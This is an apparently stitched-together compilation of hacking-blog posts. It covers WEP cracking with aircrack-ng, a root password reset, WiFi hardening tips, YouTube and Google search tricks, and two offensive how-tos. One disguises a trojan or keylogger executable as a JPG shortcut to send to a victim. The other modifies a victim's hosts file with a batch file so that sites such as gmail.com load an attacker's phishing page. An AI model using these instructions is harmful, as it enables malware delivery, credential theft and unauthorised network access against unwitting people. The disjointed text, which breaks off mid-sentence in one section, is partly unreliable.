  • You will need a computer with a wireless adapter listed here
  • Download Backtrack and burn it’s image to a CD

B. OVERVIEW

BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.

Tools Overview

  • Kismet – a wireless network detector and packet sniffer
  • airmon – a tool that can help you set your wireless adapter into monitor mode (rfmon)
  • airodump – a tool for capturing packets from a wireless router (otherwise known as an AP)
  • aireplay – a tool for forging ARP requests
  • aircrack – a tool for decrypting WEP keys
  • iwconfig – a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in “monitor” mode which is essential to sending fake ARP requests to the target router
  • macchanger – a tool that allows you to view and/or spoof (fake) your MAC address

Glossary of Terms

  • AP: Access Point: a wireless router
  • MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
  • BSSID: Access Point’s MAC address
  • ESSID: Access Point’s Broadcast name. (ie linksys, default, belkin etc) Some AP’s will not broadcast their name but Kismet may be able to detect it anyway
  • TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
  • WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
  • WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption
Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as “read-only”. I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.

C. DISCLAIMER

Hacking into someone’s wireless network without permission is probably against the law. I wouldn’t recommend doing it. I didn’t break into anyone else’s network while learning how to do this.

D. IMPLEMENTATION

STEP 1

Monitoring Wireless Traffic With Kismet

Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like “Hit ctrl+esc to change bios settings”. Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear. Type startx to start KDE (a ‘windows’ like workspace for linux).
Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:
kismet
Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely ‘ath0′, and sit back as kismet starts detecting networks in range.

NOTE: We use kismet for two reasons.

  1. To find the bssid, essid, and channel number of the AP you are accessing.
  2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point?) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device’s name just type:
iwconfig
Which will look something like this:
iwconfig.png
While kismet detects networks and various clients accessing those networks you might want to type ‘s’ and then ‘Q’ (case sensitive). This sorts all of the AP’s in your area by their signal strength. The default ‘autofit’ mode that kismet starts up in doesn’t allow you much flexibility. By sorting AP’s by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP’s that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here.
Select the AP (access point) you want to access. Copy and paste the broadcast name(essid), mac address(bssid), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite. Just open a terminal and type in ‘kwrite’ or select it from the start button. In Backtrack’s terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for more help with this

STEP 2

Collecting Data With Airodump

Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straight forward for help with this program you can always type “airodump-ng -h” at the command prompt for additional options.
airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1
Breaking down this command:
  • ath0 is my wireless card
  • -w tells airodump to write the file to
    /mnt/hda2/ryan/belkin_slax_rcu
  • 9 is the channel 9 of my target AP
  • 1 tells airodump to only collect IVS – the data packets with the WEP key

STEP 3

Associate your wireless card with the AP you are accessing.

aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
  • -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
  • 0 specifies the delay between attacks
  • -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
  • -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • ath0 at the end is my wireless adapters device name in linux

STEP 4

Start packet injection with aireplay

aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0

NOTES:

  • -b requires the MAC address of the AP we are accessing.
  • -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
  • if packets are being collected at a slow pace you can typeiwconfig ath0 rate auto to adjust your wireless adapter’s transmission rate. You can find your AP’s transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.
As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren’t many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.

If you get a message like this:

Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Just reassociate with the AP following the instructions on step 3.

STEP 5

Decrypting the WEP Key with Aircrack

Find the location of the captured IVS file you specified in step 2. Then type in a terminal:

aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs
Change /mnt/hda2/home/belkin_slax_rcu-03.ivs to your file’s location
Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn’t find a key almost immediately, just sit back and wait for more data packets.

hack linux root password

Well cracking the linux password is not a very difficult job when u login by root you can do that directly by [-]#passwd
he will ask u to type your new unix password ,enter the new unix password.
then he will ask u to retype password ,do the same
u can break any unix account password by this method
for "root" u don't need to write username of root while using "passwd" command, ucannot break password of root by any normal user.

now suppose u r administrator and u forgot ur password then on boot loader screen
press "E"
then edit first line of boot loader and type
........................................... 1 and press "b" to boot from single user mode
then it will throw u to shell prompt
sh....#
then use "passwd "command to change the password of root
sh....#passwd
now he will ask u to type ur new password, and retype it
after doing this use reboot command and start the system in runlevel 3 or five and type your
new root password..

How to protect your WiFi from hackers

After the few incidents of Indian Mujahideen hacking into Internet account of unsecured WiFi connection it is very important for everyone to make WiFi secured and this article will show you How to protect your WiFi from hacker.

Indian Mujahideen sent out in the aftermath of the Ahmedabad and Delhi blasts, who hacked into unsecure WiFi networks to send out the terror e-mail.

Well I have been using WiFi for past three years and before I could use I read couple of articles on the web to check the best security and how to enable the same.

Anyone can get into your WiFi connection if your WiFi is not secure, before we start about how to secure the WiFi, let’s check if your WiFi is secure or not.

Right click on small wireless network icon on your Task Bar, below image shows icon marked in red:

This will bring small menu as shown in below image, select “View Available Wireless Networks” from the menu.

The image below demonstrates two WiFi networks which Windows discovered. If you notice that SSwireless network is ‘Unsecured wireless network’ where as KuchBhi.com wireless network is ‘Security-enabled wireless network’ which is secured

Which means any one can connect to SS WiFi without any security Key, where as KuchBhi.com needs a valid security key to connect.

Now that you know SS is not secure which can be same case of your WiFi router.

Following are the steps which will help you secure your WiFi network:

Router / Access Point

This is the main configuration unit. If anyone gets access to this, changing any settings like passwords, encryption and MAC address is very easy. Most routers have default passwords and SSID´s. This SSID’s and password should be changed by the owner to make the entire system more secure.

1. Default Login

The first task should be to change the default user login to something else. Most of the routers normally come with default usernames and passwords like admin / admin or similar. The router can be configured using a web browser and the routers IP. These username and password are used while accessing the configuration screen.

2. Updates

NOT all router software are fool proof, you must always visit the manufactures website and look for updates for your router / access point. The updates includes security updates and other updates as well, recommended to check every once in a while.

3. Infrastructure / Ad-Hoc

With infrastructure mode enabled all device connected to the wireless LAN communicate through the access point / router while the Ad-Hoc mode allows for direct communication. Disable Ad-Hoc mode if available.

4. SSID

The SSID, Service Set IDentifier, identifies your router. Most companies use default ones which comes with the router like Linksys, wireless or WLAN or they use their company name, which are easy to guess. Choose a more secure password, best is a combination of letters and numbers.

The most important part is to disable the SSID Broadcasting, which transmits its ‘SSID’ name to everyone in range.

Wireless clients searching for a network connection can ‘discover’ it automatically. If you know the SSID then you can configure your computer in that way. It does not make sense to change the name but leave broadcasting on.

Note: It is still possible to sniff the SSID, as it still sends in clear text when a client associates with the router / access point.

5. Pings

Turn off Broadcast pings on the access point / router this makes it invisible to 802.11b analysis tools.

6. MAC Address Filtering

Every network device has a unique MAC address. The access point / router can be configured that it only accepts connections from the list of Mac address(es) specified.

Note: It’s possible to sniff your Mac addresses and fake those, don´t rely on this alone.

On windows open the command prompt and enter the command ipconfig /all

The Physical Address is your MAC address, make sure you selected the right device, a WLAN PCI card for example.

To fetch the MAC address for any other operation systems other then Windows go to this website.
7. Remote Management

Remote management is used to access/modify and configuration of Router / Access Point from any client machines using login id and password, it is recommended that this is disable, for any configuration one must connect physically to a machine via a network cable.

8. WPA, WPA2 or WEP

Nowadays most of the WiFi access point offers WAP, WPA2 and WEP types of accesses, if WiFi offers WPA2 encryption then use it.

WPA2 uses AES encryption. If the router/access point does not support WPA2 then one can choose WPA and as last resort use WEP. After selected type of security, make sure a password is assigned which is more or less immune against dictionary attacks and choose the highest available encryption option (232 ->104 -> 40)

9. WLAN Coverage

Most of us use WiFi either at home or in offices where the

HIDE EXE FILE INTO JPG AND HACK

This is a good trick to hide your exe files into a jpg file..!

How about sending a trojan or a keylogger into your victim using this trick..??

1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked.
Basically what you need is to see hidden files and see the extension of all your files on your pc.

2)
Paste a copy of your server on the new created folder. let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it)

3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg'

4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5) Now create a shortcut of this 'picture.jpeg' in the same folder.

6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'.

7) Go to properties (on file me.jpeg) and now you need to do some changes there.

8) First of all delete all the text on field 'Start In' and leave it empty.

9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this :-
'C:\WINDOWS\system32\cmd.exe /c picture.jpeg'

10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'.

11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run.

12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :-
%SystemRoot%\system32\SHELL32.dll . Then press OK.

13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone.

14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.

15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.
This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file.

16) So the best way to send these files together to someone is compress them into Zip or Rar.

17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.

HOW TO DOWNLOAD YOUTUBE VIDEOS WITHOUT SOFTWARE

DOWNLOAD YOU TUBE VIDEO WITHOUT ANY SOFTWARE

Youtube is the world's best online videos network but the problem is you can't download videos from youtube directly. There are many online sites and softwares which gives you option to download youtube videos quite easily but this is the simplest trick to download videos from youtube.

While playing the video on YouTube, just copy the location of video from the address bar like www.youtube.com/watch?v=sasad7657dms2
Now add the word ‘kick’ between www. and youtube.com/link
For example www.kickyoutube.com/watch?v=sasad7657dms2
A download page will appear,
just hit the download button and the download will start..

DESKTOP PHISHING ADVANCED HACKING

In phishing :-

1. Attacker convinces the victim to click on the link of fake login page which resembles a genuine login page.

2.Victim enters his credentials in fake login page that goes to attacker.
3.Victim is then redirected to an error page or genuine website depending on attacker.

But main drawback in phishing is that victim can easily differentiate between fake and real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing domain name.

In desktop phishing:-
1. Attacker sends an executable/batch file to victim and victim is supposed to double click on it. Attacker's job is done.
2. Victim types  the domain name of orignal/genuine website and is taken to our fake login page. But the domain name remains the same as typed by victim and victim doesn't come to know.
3. Rest of the things are same as in normal phishing.

What is Hosts File ?

The hosts file  is a text file containing domain names and IP address associated with them.
Location of hosts file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website, say www.anything.com , an query is sent to  Domain Name Server(DNS) to  look up for the IP address associated with that website/domain. But before doing this the hosts file on our local computer is checked for the IP address associated to the domain name.

Suppose we make an entry in hosts file as shown. When we visit www.anywebsite.com , we would
be taken to this 115.125.124.50. No query for resolving IP address associated with www.anywebsite.com would be sent to DNS.

What is attack ?
I hope you have got an idea that how modification of this hosts file on victim's computer can be misused. We  need to modify victim's hosts file by adding the genuine domain name and IP address of our fake website /phishing page. Whenever victim would visit the genuine website , he would be directed to our fake login page and domain name in the URL box would remain genuine as typed by victim. Hence domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's host file

Step 1 -:

Since the webshosting sites like 110mb.com,ripway.com etc where we usually upload our phishing page do not provide a IP that points to your website like www.anything.110mb.com. An IP address points to a webserver and not a website. So we need to host the phishing page on our computer using a webserver software like wamp or xampp.
Kindly read my simple  tutorial on setting up XAMPP webserver here  and this step would be clear to you.

Step 2. This  step can performed in two different ways.

Method 1 - Send victim a zip file containing modified host file . When Zip file would be clicked, It would automatically replace victim's orignal hosts file with modified hosts file.

Copy your hosts file and paste it anywhere . Modify it according to yourself..Edit it with any text editor and associate your public IP address with domain you wish as show.

Like in this case , when victim would visit gmail.com , he would be taken to website hosted on IP 'xxx.xxx.xxx.xxx'.Replace it with your public IP.Compress hosts file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file get replaced by our modified hosts file.

Then you can bind this file with any exe ( using a binder or directly give it to victim. He is supposed to click it and you are done .

Method 2 - Create a batch file which would modify hosts file as per your need.
Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
Obviously replace it with your IP and website acc. to yourself.

Save file as 'all files' instead of txt files and name it anything.bat . Extension must be .bat
When victim would run this file, a new entry will be made in hosts file.

You can test both the above methods to modify your own hosts file

Limitations of attack :-
1.Since our pubilc IP address is most probably dynamic that it gets changed everytime we disconnect and connect. To overcome this we need to purchase static IP from our ISP.
2. The browser may warn the victim that Digital Certificate of the website is not genuine.

Countermeasures:-
Never just blindly enter your credentials in a login page even if you yourself have typed a domain name in web browser. Check the protocol whether it is "http" or "https" . https is secure.

google clever tricks to be known

1.)  Common queries:

So how will you effectively use Google. Take this example. A friend of mine was asking me over yahoo messenger what is a blog. I told him to search on Google and find out. He tried this.
blog
Alas the answer was there but lost in thousands of links. He alerted me that he can't find an answer. I told " Ok , Let me see What is wrong? ". I tried this
What is blog
The answer was right there.
While formulating search queries you must be specific as far as possible. A query like Linux vpn howto can yield a different result than vpn howto. Google seems to be intelligent enough to understand some human thought chain. So while making queries be a bit descriptive and formulate a properly worded query. Google ignores some of the common words such as 'the' 'and' 'a' etc while performing a search.

2.)  How to formulate a good search string :

Google uses AND logic for the queries by default. If you search linux vpn howto google searches for pages containing linux AND vpn AND howto. You can put OR logic in the search box like this
linux OR vpn OR howto
You can exclude some terms using "-"
linux vpn -installation
Try ( linux vpn - installation ) and see how it is different from the above query. You can group a set of terms by enclosing them in brackets. It is also possible to combine AND and OR operators.
It may be noted that Google is not case sensitive regarding search strings. Linux, LINUX and linux produces the same results. However the operators such as AND and OR are case sensitive.

3.)  Searching for a file :

Suppose you want to search for pdf documents only. You can do this by attaching a filetype modifier to your query. A typical query can look like this
vpn filetype:pdf
Google can recognize most common filetyes.

4.)  Searching only at a site :

This is similar to file type modifier. Try this VPN site:ibm.com
Then try vpn site:edu filetype:pdf You can get some interesting result by trying this query
linux site:microsoft.com

5.)  Searching in URLs and Page titles :

You can search in urls using inurl modifier. Try inurl:smb.conf

Similarly you can use intitle modifier.

6.)  Searching in Google cache :

If you are looking for some old web site you can directly search in Google cache.
Try cache:slashdot.org and see the cached pages.

7.)  Looking for definitions :

This can be handy if your school going kid pesters you for his home work.
Try
define:watt
It bring out definitions from around the web.

8.)  Looking at Google advanced search :

I think it is one link that most people try to ignore. It is designed for commoners. Almost all the options I mentioned above are available through advanced search.
The preferences page is also worth a visit. It uses cookies to set preferences such as number of search results to be displayed, language preferences etc.

9.)  Finding the price of some geek gadget :

Google has a companion site called froogle.com. Its interface is exactly similar. But it returns prices across various stores in the US. This feature can be very useful if you plan to buy some strange hardware. Let us hope that froogle.co.in will appear soon.

10.)  Google Calculator :

In the google search :
Type in an equation: (100+4567*10-200=)
What is the square root of 267? (sqrt(267))

11.)  Google labs :

Google is very innovative and always tries to introduce new features. You can see some of the upcoming features at labs.google.com . Also Google conducts a puzzle champion ships annually.

12.)  Google Sets :

Google sets is an interesting feature currently available at http://labs.google.com/sets.
Have a look at the page. You will see a number of text boxes. Enter some words which belongs to a set of items and search. Google will complete the set.
I typed in the names of following linux distributions " Mandrake" "Suse" " "debian" and hit larger set button. Google provided a huge list of linux distributions.
